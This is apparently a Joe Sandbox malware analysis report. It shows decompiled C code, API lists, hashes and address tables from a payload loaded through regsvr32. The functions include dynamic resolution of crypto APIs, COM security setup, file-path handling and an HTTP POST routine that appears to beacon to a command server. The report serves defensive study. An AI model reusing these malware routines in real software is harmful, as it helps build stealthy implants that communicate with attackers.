                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eee58
                                                                                                                                                                        0x049eee58
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eee58
                                                                                                                                                                        0x049eeb8f
                                                                                                                                                                        0x049eeb95
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeb95
                                                                                                                                                                        0x049eee55
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eead8
                                                                                                                                                                        0x049eeadd
                                                                                                                                                                        0x049eeae2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049eeae6

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049EE400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE413
                                                                                                                                                                          • Part of subcall function 049EE400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE424
                                                                                                                                                                          • Part of subcall function 049EE400: CoCreateInstance.OLE32(049FC868,00000000,00000001,049FC878,?,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE43B
                                                                                                                                                                          • Part of subcall function 049EE400: SysAllocString.OLEAUT32(00000000), ref: 049EE446
                                                                                                                                                                          • Part of subcall function 049EE400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE471
                                                                                                                                                                          • Part of subcall function 049E8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 049EEAF3
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 049EEB07
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 049EEE90
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 049EEE99
                                                                                                                                                                          • Part of subcall function 049E8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 049E8C3A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                        • String ID: FALSE$TRUE
                                                                                                                                                                        • API String ID: 1290676130-1412513891
                                                                                                                                                                        • Opcode ID: eca18684e4c7c1e39a9353b08141e9d5b2665d11e9b6d1b340eac3d6a7b5600b
                                                                                                                                                                        • Instruction ID: b11c49b359d1e61ee937280434038a2d1bf3083782bfc2734a33e18267d524bc
                                                                                                                                                                        • Opcode Fuzzy Hash: eca18684e4c7c1e39a9353b08141e9d5b2665d11e9b6d1b340eac3d6a7b5600b
                                                                                                                                                                        • Instruction Fuzzy Hash: B6E14DB1E00219AFDF16DFE5C888ABEBBB9FF48304F144469E505A7290DB74B945CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F28F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E049F28F0(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E049F284B( &_v16);
				return 0;
			}











                                                                                                                                                                        0x049f28f6
                                                                                                                                                                        0x049f2908
                                                                                                                                                                        0x049f290c
                                                                                                                                                                        0x049f2980
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f2982
                                                                                                                                                                        0x049f291c
                                                                                                                                                                        0x049f2920
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f2928
                                                                                                                                                                        0x049f292a
                                                                                                                                                                        0x049f292f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f2939
                                                                                                                                                                        0x049f293d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f293f
                                                                                                                                                                        0x049f2944
                                                                                                                                                                        0x049f2946
                                                                                                                                                                        0x049f2948
                                                                                                                                                                        0x049f294d
                                                                                                                                                                        0x049f2952
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f295d
                                                                                                                                                                        0x049f2967
                                                                                                                                                                        0x049f296b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f297a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,049E7B6A), ref: 049F2902
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 049F291A
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 049F2928
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 049F2937
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                        • API String ID: 667068680-129414566
                                                                                                                                                                        • Opcode ID: 1842b4d10df27f54f4a0f45b9d17f63055bdb785f0f5328c1a80e7584807216d
                                                                                                                                                                        • Instruction ID: 14f57213146b32529256035dc625beca754cbf62297528241a8d0d306c4ca087
                                                                                                                                                                        • Opcode Fuzzy Hash: 1842b4d10df27f54f4a0f45b9d17f63055bdb785f0f5328c1a80e7584807216d
                                                                                                                                                                        • Instruction Fuzzy Hash: 34118272A4130A77DB1197E49D41FDEB6AC9F84750F5900B0EB00F7180EA71FA518BA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EF7A6 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 267COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E049EF7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E049E9DD8(0xd62);
				_v52 = E049E9DD8(0x8e9);
				_v48 = E049E9DD8(0xa93);
				_v44 = E049E9DD8(0x9a9);
				_t94 = E049E9DD8(0xb64);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E049E8D6D( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E049EA43D(_t190));
				_t102 =  *0x49ff838; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x49ff838; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x49ff920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E049EF73E(_t189);
							_t110 =  *0x49ff838; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E049EA065(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x49ff838; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E049EA065(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E049EF6EC(_t116);
									}
									_t117 = E049E9DD8(0x901);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x49ff838; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E049EA43D(_t193), _a4, _a8);
									E049E8B9C( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E049EA065(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E049E8D6D( &_v20, 0, _t122);
										_t127 =  *0x49ff838; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E049E9F6F( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x49ff838; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x49ff838; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x49ff838; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x49ff838; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x49ff838; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x49ff838; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x49ff838; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x49ff838; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x49ff838; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}





























































                                                                                                                                                                        0x049ef7b4
                                                                                                                                                                        0x049ef7c0
                                                                                                                                                                        0x049ef7c7
                                                                                                                                                                        0x049ef7d4
                                                                                                                                                                        0x049ef7d7
                                                                                                                                                                        0x049ef7e8
                                                                                                                                                                        0x049ef7ff
                                                                                                                                                                        0x049ef80c
                                                                                                                                                                        0x049ef819
                                                                                                                                                                        0x049ef826
                                                                                                                                                                        0x049ef829
                                                                                                                                                                        0x049ef82e
                                                                                                                                                                        0x049ef833
                                                                                                                                                                        0x049ef835
                                                                                                                                                                        0x049ef83d
                                                                                                                                                                        0x049ef845
                                                                                                                                                                        0x049ef84c
                                                                                                                                                                        0x049ef858
                                                                                                                                                                        0x049ef85b
                                                                                                                                                                        0x049ef869
                                                                                                                                                                        0x049ef86c
                                                                                                                                                                        0x049ef872
                                                                                                                                                                        0x049ef873
                                                                                                                                                                        0x049ef875
                                                                                                                                                                        0x049ef87e
                                                                                                                                                                        0x049ef87f
                                                                                                                                                                        0x049ef884
                                                                                                                                                                        0x049ef88a
                                                                                                                                                                        0x049ef894
                                                                                                                                                                        0x049ef894
                                                                                                                                                                        0x049ef896
                                                                                                                                                                        0x049ef89b
                                                                                                                                                                        0x049ef8a5
                                                                                                                                                                        0x049ef8b0
                                                                                                                                                                        0x049ef8b9
                                                                                                                                                                        0x049ef8bb
                                                                                                                                                                        0x049ef8bd
                                                                                                                                                                        0x049ef8cc
                                                                                                                                                                        0x049ef8e3
                                                                                                                                                                        0x049ef8e9
                                                                                                                                                                        0x049ef8ec
                                                                                                                                                                        0x049ef8f0
                                                                                                                                                                        0x049ef8f2
                                                                                                                                                                        0x049ef8f7
                                                                                                                                                                        0x049ef8f7
                                                                                                                                                                        0x049ef8fc
                                                                                                                                                                        0x049ef8fe
                                                                                                                                                                        0x049ef914
                                                                                                                                                                        0x049ef918
                                                                                                                                                                        0x049ef91d
                                                                                                                                                                        0x049ef91f
                                                                                                                                                                        0x049ef91f
                                                                                                                                                                        0x049ef933
                                                                                                                                                                        0x049ef93e
                                                                                                                                                                        0x049ef941
                                                                                                                                                                        0x049ef944
                                                                                                                                                                        0x049ef947
                                                                                                                                                                        0x049ef94c
                                                                                                                                                                        0x049ef951
                                                                                                                                                                        0x049ef951
                                                                                                                                                                        0x049ef954
                                                                                                                                                                        0x049ef956
                                                                                                                                                                        0x049ef97c
                                                                                                                                                                        0x049ef980
                                                                                                                                                                        0x049ef984
                                                                                                                                                                        0x049ef984
                                                                                                                                                                        0x049ef98e
                                                                                                                                                                        0x049ef996
                                                                                                                                                                        0x049ef99b
                                                                                                                                                                        0x049ef9a6
                                                                                                                                                                        0x049ef9ac
                                                                                                                                                                        0x049ef9b6
                                                                                                                                                                        0x049ef9b9
                                                                                                                                                                        0x049ef9be
                                                                                                                                                                        0x049ef9c2
                                                                                                                                                                        0x049ef9c7
                                                                                                                                                                        0x049ef9c7
                                                                                                                                                                        0x049ef9cc
                                                                                                                                                                        0x049ef9d0
                                                                                                                                                                        0x049efa1b
                                                                                                                                                                        0x049efa1d
                                                                                                                                                                        0x049efa20
                                                                                                                                                                        0x049efa28
                                                                                                                                                                        0x049efa2c
                                                                                                                                                                        0x049efa2f
                                                                                                                                                                        0x049efa41
                                                                                                                                                                        0x049efa4c
                                                                                                                                                                        0x049efa4e
                                                                                                                                                                        0x049efa62
                                                                                                                                                                        0x049efa67
                                                                                                                                                                        0x049efa6c
                                                                                                                                                                        0x049efaa1
                                                                                                                                                                        0x049efaa6
                                                                                                                                                                        0x049efaab
                                                                                                                                                                        0x049efaad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049efaad
                                                                                                                                                                        0x049efa70
                                                                                                                                                                        0x049efa73
                                                                                                                                                                        0x049efa73
                                                                                                                                                                        0x049efa79
                                                                                                                                                                        0x049efa7c
                                                                                                                                                                        0x049efa7f
                                                                                                                                                                        0x049efa7f
                                                                                                                                                                        0x049efa81
                                                                                                                                                                        0x049efa83
                                                                                                                                                                        0x049efa89
                                                                                                                                                                        0x049efa89
                                                                                                                                                                        0x049efa8c
                                                                                                                                                                        0x049efa8e
                                                                                                                                                                        0x049efa90
                                                                                                                                                                        0x049efa97
                                                                                                                                                                        0x049efa97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049efa9a
                                                                                                                                                                        0x049efa50
                                                                                                                                                                        0x049efa56
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ef9d2
                                                                                                                                                                        0x049ef9d2
                                                                                                                                                                        0x049ef9d8
                                                                                                                                                                        0x049ef9de
                                                                                                                                                                        0x049ef9e1
                                                                                                                                                                        0x049ef9e6
                                                                                                                                                                        0x049ef9eb
                                                                                                                                                                        0x049ef9ee
                                                                                                                                                                        0x049ef9f3
                                                                                                                                                                        0x049ef9f3
                                                                                                                                                                        0x049ef9f6
                                                                                                                                                                        0x049ef9f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ef9f9
                                                                                                                                                                        0x049ef958
                                                                                                                                                                        0x049ef958
                                                                                                                                                                        0x049ef95e
                                                                                                                                                                        0x049ef964
                                                                                                                                                                        0x049ef967
                                                                                                                                                                        0x049ef96c
                                                                                                                                                                        0x049ef96f
                                                                                                                                                                        0x049ef972
                                                                                                                                                                        0x049ef974
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ef974
                                                                                                                                                                        0x049ef900
                                                                                                                                                                        0x049ef900
                                                                                                                                                                        0x049ef906
                                                                                                                                                                        0x049ef90c
                                                                                                                                                                        0x049ef9fc
                                                                                                                                                                        0x049ef9fc
                                                                                                                                                                        0x049ef9fc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ef9fc
                                                                                                                                                                        0x049ef8fe
                                                                                                                                                                        0x049ef8bf
                                                                                                                                                                        0x049ef9fe
                                                                                                                                                                        0x049efa01
                                                                                                                                                                        0x049efa03
                                                                                                                                                                        0x049efa06
                                                                                                                                                                        0x049efa09
                                                                                                                                                                        0x049efa09
                                                                                                                                                                        0x049efa12
                                                                                                                                                                        0x049efa14
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049efa18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049efa18
                                                                                                                                                                        0x049ef88e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 049EF7D7
                                                                                                                                                                        • memset.MSVCRT ref: 049EF7E8
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 049EF8BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast
                                                                                                                                                                        • String ID: POST
                                                                                                                                                                        • API String ID: 2570506013-1814004025
                                                                                                                                                                        • Opcode ID: 9faef6025c1ead8f4fc0b82a9cdb2406170372a0fccb6aac80f9e54145c1cebe
                                                                                                                                                                        • Instruction ID: 3baa30c5c85b3d9dd45bc47fcb1b5e54aa6d1938c45469cf541ee108218cf720
                                                                                                                                                                        • Opcode Fuzzy Hash: 9faef6025c1ead8f4fc0b82a9cdb2406170372a0fccb6aac80f9e54145c1cebe
                                                                                                                                                                        • Instruction Fuzzy Hash: 00A13EB1A00218AFDB12DFA5D848BFE7BB8EF48314F10447AE905E7254DB35AE45CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F1464 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snprintfqsort
                                                                                                                                                                        • String ID: %I64d$false$null$true
                                                                                                                                                                        • API String ID: 756996078-4285102228
                                                                                                                                                                        • Opcode ID: 5495c167347e6929a6c43f1dc80e1eba3b7d55343b62afb87945a18cc83d87d5
                                                                                                                                                                        • Instruction ID: 5b36f9b183d30f02129e7983450112d1f8537d151d4090d47f4952296ea005b4
                                                                                                                                                                        • Opcode Fuzzy Hash: 5495c167347e6929a6c43f1dc80e1eba3b7d55343b62afb87945a18cc83d87d5
                                                                                                                                                                        • Instruction Fuzzy Hash: C1E14AB1A0020AFBEF119FA4DD46EAB3B69EF84354F008435FE1596140E631FE619BE1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049E50B3 Relevance: 9.3, APIs: 6, Instructions: 263stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E049E50B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				signed int _v588;
				intOrPtr _v592;
				WCHAR* _v596;
				char _v600;
				intOrPtr _v604;
				char _v632;
				char _v636;
				void* __ebx;
				void* __esi;
				intOrPtr _t56;
				char _t63;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t72;
				void* _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t79;
				signed int _t81;
				intOrPtr _t82;
				WCHAR* _t84;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t97;
				signed char _t104;
				void* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				void* _t113;
				void* _t114;
				WCHAR* _t115;
				void* _t126;
				WCHAR* _t130;
				intOrPtr _t142;
				void* _t143;
				void* _t163;
				signed int _t166;
				void* _t167;
				void* _t169;
				void* _t173;
				signed int _t174;
				WCHAR* _t176;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t180;
				signed int _t182;
				void* _t185;
				void* _t186;
				WCHAR** _t187;
				void* _t192;

				_t192 = __fp0;
				_push(_t177);
				_t113 = __edx;
				_t173 = __ecx;
				_t178 = _t177 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_v588 = _v588 & 0x00000000;
				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
				_v596 = 1;
				if(_t173 != 0) {
					_t108 =  *0x49ff81c; // 0x4befbe8
					_t5 = _t108 + 0x110; // 0x4bf16b8
					_t110 =  *0x49ff820; // 0x4befaa0
					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
				}
				if(E049EC9F4(_t173) != 0) {
					L4:
					_t56 = E049EC6CE();
					_push(_t113);
					_v592 = _t56;
					E049EC4C1(_t56,  &_v580, _t190, _t192);
					_t114 = E049E5072( &_v580,  &_v580, _t190);
					_t126 = E049EE2C5( &_v580, E049EA43D( &_v580), 0);
					E049EC6E4(_t126,  &_v548, _t192);
					_push(_t126);
					_t161 =  &_v580;
					_t63 = E049E317E(_t173,  &_v580, _t190, _t192);
					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x49fc9a0);
						_t115 = E049E9A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x49ff81c; // 0x4befbe8
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E049E98BD(_v600);
								_t130 = _t115;
								 *0x49ff8d8 = _t66;
								 *0x49ff8d0 = E049E98BD(_t130);
								L17:
								_push(_t130);
								_t174 = E049EA633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x49fc9f2);
								_t163 = 0xe;
								E049EAAA3(_t163, _t192);
								E049EAADC(_t174, _t192, _t115);
								_t180 = _a4;
								_push( *_t180);
								E049EAA7E(0xb);
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E049EB025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E049EB025(_t166, _t192);
								}
								_t76 = E049EA065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E049EAA50();
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x49ff81c; // 0x4befbe8
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E049F0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x49ff81c; // 0x4befbe8
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E049EF0DE(_t169);
										}
										E049E584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x49ff81c; // 0x4befbe8
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E049E109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E049E8BAF( &_v596);
												 *_t187 = 0x49fc9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x49fc9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x4befe10
									_t142 = _t40;
									L25:
									_t78 = E049E5AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x49ff81c; // 0x4befbe8
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E049ED11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x49ff818; // 0x4bef8b0
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x49ff818; // 0x4bef8b0
								 *((intOrPtr*)(_t97 + 0x30))();
								E049E8BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E049E8BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t18 = _t65 + 0x1898; // 0x0
						_t104 =  *_t18;
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
							L11:
							E049EF1F6(_v600, _t161);
							goto L12;
						}
						E049EF1B6(_v600,  &_v580);
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t107 = E049E3097( &_v532, _t178, 0x105);
					_t190 = _t107;
					if(_t107 == 0) {
